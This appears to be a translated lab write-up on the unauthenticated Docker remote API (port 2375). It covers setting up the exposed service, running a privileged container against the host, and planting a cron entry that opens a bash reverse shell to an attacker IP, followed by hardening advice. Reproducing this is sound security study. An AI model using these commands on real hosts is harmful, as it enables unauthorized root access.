Docker Unauthorized Access Vulnerability

Vulnerability Description

Malicious attackers can access Docker servers or containers without authorization. This can result in sensitive data leaks or allow attackers to perform unauthorized actions such as adding, modifying, or deleting containers.

Environment Setup

Install docker

yum install -y docker

Modify the /usr/lib/systemd/system/docker.service service to start the API interface.

ExecStart=/usr/local/bin/dockerd -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock

image-20220726104747298

Restart the docker service.

systemctl daemon-reload
systemctl restart docker

image-20220726104829456

漏洞复现

Entering ip:2375/version will list basic information, the same effect as the docker version command.

image-20220726104904921

Exploit Docker container to write a timed task to bounce a shell

We can use the unauthenticated Docker remote API to start a container and mount it to the root directory, thus giving us arbitrary read-write privileges. Then we write the reverse shell command into the crontab of the timed task, which can cause the host to bounce the shell.

[root@localhost ~]# docker -H tcp://192.168.32.183:2375 run -it --user root --privileged -v /var/spool/cron/:/var/spool/cron/ alpine sh

Write to the schedule

/ # echo '* * * * * bash -i >& /dev/tcp/192.168.32.130/8088 0>&1' >> /var/spool/cron/root

image-20220726110359885

Security Hardening

Do not enable the Docker remote API service unless necessary. If it is necessary, the following hardening methods can be used:

basicCopy codeSet ACLs to only allow trusted source IPs to connect;
Set TLS authentication, the official document for Protecting the Docker daemon socket

After the certificate for communication between the client and server is generated, the following command can be used to start the Docker daemon:

docker -d --tlsverify --tlscacert=ca.pem --tlscert=server-cert.pem --tlskey=server-key.pem -H=tcp://10.10.10.10:2375 -H unix:///var/run/docker.sock